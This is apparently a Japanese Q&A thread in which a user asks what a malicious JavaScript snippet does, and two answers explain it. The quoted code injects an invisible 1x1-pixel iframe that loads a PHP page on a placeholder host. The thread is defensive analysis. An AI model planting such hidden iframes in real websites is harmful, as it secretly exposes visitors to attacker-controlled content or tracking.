2

この悪意のある JavaScript コードは正確には何をしているのでしょうか?

(function () {
    var qk = document.createElement('iframe');

    qk.src = 'http://xxx.tld/wp-includes/dtd.php';
    qk.style.position = 'absolute';
    qk.style.border = '0';
    qk.style.height = '1px';
    qk.style.width = '1px';
    qk.style.left = '1px';
    qk.style.top = '1px';

    if (!document.getElementById('qk')) {
        document.write('<div id=\'qk\'></div>');
        document.getElementById('qk').appendChild(qk);
    }
})();

の Web サイトhttp://xxx.tld/wp-includes/dtd.phpは OK を返すだけです。

4

3 に答える 3

5

それは:

(function () {
    var qk = document.createElement('iframe');  // creating an iframe

    qk.src = 'http://xxx.tld/wp-includes/dtd.php';  // pointing it at a webpage

    /*
    making the iframe only take up a 1px by 1px square
    in the top left-hand corner of the web page it is injected into
    */
    qk.style.position = 'absolute';
    qk.style.border = '0';
    qk.style.height = '1px';
    qk.style.width = '1px';
    qk.style.left = '1px';
    qk.style.top = '1px';

    /*
    Adding the iframe to the DOM by creating a <div> with an ID of "qt"
    (If the div has not been created already)
    */    
    if (!document.getElementById('qk')) {
        document.write('<div id=\'qk\'></div>');
        document.getElementById('qk').appendChild(qk);
    }
})();

iframe が DOM に挿入されると、ブラウザは にリクエストを送信しhttp://xxx.tld/etcます。サイトでのヒットを追跡するためにこれを行う可能性が最も高い.

于 2013-04-05T03:29:45.913 に答える
0

iframe を開き、php スクリプトを実行します。

これにはおそらく誰が何を知っているかが含まれています。

また、qk の ID を持つ div の存在が必要なようです。おそらく、他の悪いコードを挿入するためです。

于 2013-04-05T03:29:00.733 に答える